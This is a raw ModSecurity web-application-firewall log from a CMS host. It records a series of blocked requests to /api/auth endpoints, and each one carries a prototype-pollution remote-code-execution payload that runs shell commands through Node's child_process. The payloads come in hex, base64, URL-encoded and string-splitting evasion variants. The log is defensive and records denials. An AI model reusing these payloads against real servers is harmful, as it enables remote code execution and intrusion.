"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmxZc83uMXRUE9zvQSnAAAAcw"] [Sun Apr 05 15:42:29.903320 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:41504] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmxbxQSOrq_iRTM7dpIgAAARA"] [Sun Apr 05 15:42:29.903521 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:41546] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmxbxQSOrq_iRTM7dpIwAAAQY"] [Sun Apr 05 15:42:29.906586 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:41520] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmxbxQSOrq_iRTM7dpJAAAAQ4"] [Sun Apr 05 15:42:29.937671 2026] [:error] [pid 22788:tid 22813] [client 172.94.9.253:41512] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmxSLbhFL16Wsx-C9C9wAAAZc"] [Sun Apr 05 15:42:35.015967 2026] [:error] [pid 23077:tid 23102] [client 172.94.9.253:41570] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy5c83uMXRUE9zvQSuQAAAdM"] [Sun Apr 05 15:42:35.026119 2026] [:error] [pid 13019:tid 13250] [client 172.94.9.253:41658] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmy7xQSOrq_iRTM7dpcQAAAQo"] [Sun Apr 05 15:42:35.026403 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:41604] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmy7xQSOrq_iRTM7dpcAAAAQ0"] [Sun Apr 05 15:42:35.026405 2026] [:error] [pid 13019:tid 13248] [client 172.94.9.253:41628] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmy7xQSOrq_iRTM7dpcgAAAQg"] [Sun Apr 05 15:42:35.026924 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:41598] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy5c83uMXRUE9zvQSugAAAdc"] [Sun Apr 05 15:42:35.027122 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:41582] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy5c83uMXRUE9zvQSuwAAAco"] [Sun Apr 05 15:42:35.028852 2026] [:error] [pid 23077:tid 23098] [client 172.94.9.253:41620] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy5c83uMXRUE9zvQSvAAAAc8"] [Sun Apr 05 15:42:35.029096 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:41648] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy7xQSOrq_iRTM7dpcwAAAQs"] [Sun Apr 05 15:42:35.031147 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:41572] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmy5c83uMXRUE9zvQSvQAAAcY"] [Sun Apr 05 15:42:35.042695 2026] [:error] [pid 1503:tid 1505] [client 172.94.9.253:41622] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signout"] [unique_id "adJmy0I7AjfUQYCN-J7DggAAAMA"] [Sun Apr 05 15:42:35.127019 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:41676] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy7xQSOrq_iRTM7dpdAAAARY"] [Sun Apr 05 15:42:35.134829 2026] [:error] [pid 31198:tid 31265] [client 172.94.9.253:41702] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmyzT5TgrBR8xRnfXA6QAAAU0"] [Sun Apr 05 15:42:35.136427 2026] [:error] [pid 13019:tid 13242] [client 172.94.9.253:41692] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy7xQSOrq_iRTM7dpdgAAAQI"] [Sun Apr 05 15:42:35.137350 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:41698] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/callback"] [unique_id "adJmy7xQSOrq_iRTM7dpdwAAARA"] [Sun Apr 05 15:42:35.137715 2026] [:error] [pid 23077:tid 23087] [client 172.94.9.253:41738] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 